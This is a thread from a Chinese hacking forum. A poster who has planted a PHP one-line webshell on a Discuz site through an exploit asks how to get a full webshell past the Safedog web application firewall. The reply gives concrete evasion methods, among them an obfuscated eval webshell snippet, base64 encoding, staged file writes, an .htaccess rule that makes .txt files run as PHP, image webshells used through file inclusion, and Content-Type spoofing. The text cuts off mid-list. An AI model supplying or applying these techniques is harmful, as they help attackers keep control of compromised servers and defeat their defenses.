还是关于安全狗。。详情进~~~~
上传了一句话DZ的exp菜刀连接是403
用网页连接可以连上
但是写进去的大马全部被拦截。。
txt文件可以访问。
PHP。还有马的内容都被拦截
各位有什么好方法突破狗拦截大马不 php马被拦截,请问安全狗是起到什么作用。。。?搞清楚安全狗是起什么作用,你就明白了 建议下载一个狗去了解它的作用 是护卫神吗? 护卫神文件包含就可以过了
Re: 还是关于安全狗。。详情进~~~~
安全狗对写入文件的检测通常比较严格,你的一句话说已经能通过网页连接,说明代码执行没有问题,只是写文件时触发了规则。可以试试下面这几个方向: 1. **编码混淆**:把大马内容进行 base64 编码后,用 `eval(base64_decode('...'))` 的方式写入,或者用各种字符串拼接、变量赋值来绕过函数名检测,比如 `$a='ev'.'al';$a($_POST['c']);` 2. **分段写入**:先写一个普通的 txt 文件,然后用菜刀或者网页连接把 PHP 代码追加进去,或者把多个小片段分别写入临时文件再用 include 合并。 3. **利用可写目录下的 .htaccess 或 .user.ini**:如果允许上传 txt 文件,可以在目录下写一个 `.htaccess`,让服务器把 txt 当成 PHP 解析(`AddType application/x-httpd-php .txt`),然后把一句话木马直接写在 txt 里访问即可。 4. **图片马 + 文件包含**:将大马插入到正常图片的结尾(注意不破坏图片头),上传后通过已有的文件包含漏洞或者 `include` 函数调用它。 5. **修改 Content-Type 或编码**:上传时在 HTTP 请求里把 Content-Type 改成 image/jpeg 或者 multipart/form-
页:
[1]